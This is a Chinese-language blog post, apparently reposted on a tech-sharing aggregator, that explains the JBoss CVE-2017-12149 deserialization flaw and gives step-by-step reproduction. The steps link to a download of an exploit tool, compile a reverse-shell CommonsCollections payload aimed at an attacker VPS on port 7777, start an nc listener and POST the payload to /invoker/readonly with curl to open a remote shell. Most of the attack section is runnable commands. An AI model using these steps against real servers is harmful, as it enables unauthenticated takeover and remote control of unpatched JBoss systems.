标签:7777 java zip ReverseShellCommonsCollectionsHashMap JBoss 漏洞 2017 序列化
漏洞分析
https://www.freebuf.com/vuls/165060.html
漏洞原理
该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意代码,获得服务器的控制权。
影响范围
Jboss 5.x -6.x
漏洞验证
漏洞文件在 /invoker/readonly,即
返回500,说明存在漏洞
复现
方法1
利用工具
http://scan.javasec.cn/java/jboss_CVE-2017-12149.zip 直接反弹shell
输入目标ip端口,和反弹ip和端口即可
nc -lvnp 7777
方法2
1.下载工具
git clone http://scan.javasec.cn/java/JavaDeserH2HC.zip
解压
unzip JavaDeserH2HC.zip
2. cd JavaDeserH2HC 进去,执行命令
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap vpsIP:7777
执行2条命令会生成文件 ReverseShellCommonsCollectionsHashMap.ser
3.监听7777端口
nc -lvnp 7777
4.利用 curl 命令,搭建起数据通道,curl 生成的文件,就会去请求,执行文件里的命令
curl http://目标ip:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
5.成功反弹shell
标签:7777,java,zip,ReverseShellCommonsCollectionsHashMap,JBoss,漏洞,2017,序列化 来源: https://www.cnblogs.com/null1433/p/12705881.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。